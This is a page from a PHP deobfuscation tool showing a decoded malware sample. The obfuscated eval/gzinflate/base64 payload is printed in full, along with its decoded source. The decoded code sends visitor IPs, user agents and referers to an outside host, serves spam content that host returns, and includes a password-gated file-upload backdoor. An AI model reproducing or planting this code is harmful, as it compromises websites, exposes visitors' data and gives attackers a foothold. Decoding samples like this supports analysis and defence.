Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode("rVVtT+NGEP58SPyHxUWsXYUkJNcDEZy7KBgOlSbUcfoihKyNvcZ7Z3ste5Om..

Decoded Output download

error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
$lan = base64_encode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$uri = base64_encode(@$_SERVER['REQUEST_URI']);
$host = @$_SERVER['HTTP_HOST'];
$agent = base64_encode(@$_SERVER['HTTP_USER_AGENT']);
$referer = base64_encode(@$_SERVER['HTTP_REFERER']);
$ip = base64_encode(@$_SERVER['REMOTE_ADDR']);
$zone=base64_encode(date_default_timezone_get());
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$goweb = "https://passhome.top";
$typeName = base64_encode($http_type.$host);
$geturl = $goweb.'/index.php?domain='.$typeName.'&uri='.$uri.'&lan='.$lan.'&agent='.$agent.'&zone='.$zone.'&ip='.$ip.'&goweb='.$goweb.'&referer='.$referer;
$file_contents = getCurl($geturl);
if(stripos($_SERVER['REQUEST_URI'],'jp2023')!==false){
    echo $host.":cs037-ok;";
    exit();
}
if(md5($_GET['upload'])=="b242fbecdf37cc338fb21ca8711682d3"){
	echo '<form method="post" action="" enctype="multipart/form-data"><label for="file">file</label><input type="file" name="up" value=""><br><input type="submit" name="submit" value="submit"></form>';
	if(move_uploaded_file($_FILES['up']['tmp_name'],'./'.$_FILES['up']['name'])){echo 'ok!';};exit();
}
if(strstr($file_contents,"[#*#*#]")){
    $html = explode("[#*#*#]",$file_contents);
    if($html[0] == "echohtml"){ echo $html[1]; exit; }
    if($html[0] == "echoxml"){ header("Content-type: text/xml"); echo $html[1]; exit; }
    if($html[0] == "echorss"){ header("Content-type: text/xml"); echo $html[1]; exit; }
    if($html[0] == "pingxml"){
        $maps=explode("|||",$html[1]);
        foreach($maps as $v){
            $pingRes = getCurl($v); $Oooo0s = (strpos($pingRes, 'Sitemap Notification Received') !== false) ? 'OK' : 'ERROR';
            echo $v . '===>Sitemap: ' . $Oooo0s ."<br>";
        }
        exit;}
}
function getCurl($url)
{
    $file_contents = @file_get_contents($url);
    if (!$file_contents) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        $file_contents = curl_exec($ch);
        curl_close($ch);
    }
    return $file_contents;
}

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode("rVVtT+NGEP58SPyHxUWsXYUkJNcDEZy7KBgOlSbUcfoihKyNvcZ7Z3ste5OmPfjvnVk7kADH9aQmUbwzO/Ps7DMv5kUhC7/guSyUyG7NttXb3oo5C3lh0qHMFM/Uvvd3zo+J4kvVilWa9EgQs6Lkyp6raP+IostuwjJikxkr+bu3Ps8CGXLzw64/cdzfHPeafvS8K38wHDpXnn85GJ1PB+cOvdGe80K85uk6v06diedP3YvaIZalAo+n6B/HE4/eoAG7hai/Gc0UJB/CGHk1bsEjXvDim46uc+a4jlt7ifz16H8Ze44/OD1d2f8jM25v2odMcT/kEZsnylci5Wjj33JlWtWFlcp9BUmAk0xTlEC9uRnTBMDJ3h55piW2TajMqEXu7siLrv4f/tnY/X3gnjqn/pU79sYvYr1kpsExuJJaFnlfr49bLUqOKwHXeINb+RefQfTGyiJnZRnLlDeVzA20wOuNWMqfkfl4+6bOvGYEuJkXCdhWyE3aElnIl808zt+HMmUis2nzAbNJ96DIUAMPEKBWUYAHCLpYUNQLUOgEgYxPEEWOgshhqc9CqT50r64YVNVLDC4SCfeDqndKiBGCHUK0Zh01XkBEZqkKkcvS/EqlN+invNPudKm1Y9sRS0pufdneIvDhQSyJpqJpHAdlu3u4Lz/3kES9uxRQNiDc61PS8Cc44dzxruk8TyQLIbm2bcw6bzvRjAdh1D0Mgm73KJp1DgJ2dHhw8O6oE3YNPOyNPomeRLJIScpVLEPbgJCVQVighMxswyCQJaTZNlIoXpGzQrXQfh9qmhn9k4TNeEJAYxtIi9HH/5OWVvdPRJbPFan89TbJIF22Mc8NsmDJHJaAMSs2Lcv5LBVqZbuSavta7J/oMPpYfW+QB7ngfsUAD308C2g5u7h0JkgMvbmmKs19RETqmy3I6OZ2tWVZXypS5Ocd2rvvPWEbcgo/c7MCGsb1Dz/C98awVincxTEKlcGXEBHU+INFY9PVqpMK0Nrluq17zsAYUIY0rcoBdw9uejr/PXL/db9l5VbPeGM149XjjNcWve8GLsry/wfO4aVURVzta/ZSlpf2A3d3d3fAWw23Ygw/UACcBbGp7Qkrye5iHUZDIb7LN7p0ASHujqWUbVRjTnWb1pYNQidCcYAkI6lEJAKGrUBcHnCx4CFMWmhYUnUszsTxz3oaOq47dmlv8/iKiQVpEmrbdr8GBmvQrEJoGtgAxprn/eNSc3evyy+aZ7opHy+Cs2Z7a1VyT6fSB60A4wdl5fFQcsTceVKNZD0JQQwgAXj4IqubYLWntfCmkTm8bIK4QYZT93J8hZPtskHWT3nVejK59GEwXpz9ia/2Bml/p9eV47j/1ct1vKk78tzBaAIv98bButMz6jQKX/IAMZ7BB4ks+fpOna8Cp3/2BA1Hx78=")))

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 9aadd4feaf998decf2b37198200efff9
Eval Count 1
Decode Time 41 ms